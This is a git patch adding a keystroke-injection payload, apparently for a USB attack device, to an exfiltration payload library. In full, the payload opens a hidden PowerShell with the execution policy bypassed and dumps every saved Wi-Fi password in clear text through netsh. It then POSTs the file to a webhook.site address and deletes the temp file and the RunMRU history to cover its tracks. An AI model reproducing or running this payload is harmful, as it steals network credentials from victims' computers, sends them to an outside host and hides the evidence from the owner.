From aa0c9e374d9d25fd0001120f42bf78fe4645aa3b Mon Sep 17 00:00:00 2001
From: 0x00 <53458032+Scrut1ny@users.noreply.github.com>
Date: Mon, 17 Oct 2022 00:50:47 -0400
Subject: [PATCH] Create Fast WiFi Exfil (Powershell - No RunMRU History)

---
 ... WiFi Exfil (Powershell - No RunMRU History) | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 payloads/library/exfiltration/WiFi_Passwd_Grab/Fast WiFi Exfil (Powershell - No RunMRU History)

diff --git a/payloads/library/exfiltration/WiFi_Passwd_Grab/Fast WiFi Exfil (Powershell - No RunMRU History) b/payloads/library/exfiltration/WiFi_Passwd_Grab/Fast WiFi Exfil (Powershell - No RunMRU History)
new file mode 100644
index 0000000..d4c9232
--- /dev/null
+++ b/payloads/library/exfiltration/WiFi_Passwd_Grab/Fast WiFi Exfil (Powershell - No RunMRU History)	
@@ -0,0 +1,17 @@
+DELAY 1000
+GUI r
+DELAY 200
+STRING powershell -w h -ep bypass "function w{switch -r(netsh wl sh pr){':\s(.+)'{$s=$matches.1;switch -r(netsh wl sh pr n=$s k=clear){'tent.+:\s(.+)'{[PSCustomObject]@{SSID=$s;Pass=$matches.1}}}}}};$w=w;echo $w > $env:tmp\Wi-Fi-PASS"
+ENTER
+DELAY 100
+GUI r
+DELAY 200
+STRING powershell -w h -ep bypass Invoke-WebRequest -Uri https://webhook.site/ac411e28-1198-4cbd-851e-74aa9cb5a5d2 -Method POST -InFile $env:tmp\Wi-Fi-PASS;Remove-Item $env:tmp\Wi-Fi-PASS -Force -ErrorAction SilentlyContinue
+ENTER
+DELAY 100
+GUI r
+DELAY 200
+STRING powershell -w h -ep bypass Remove-ItemProperty -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU’ -Name ‘*’ -ErrorAction SilentlyContinue
+ENTER
+DELAY 100
+EXIT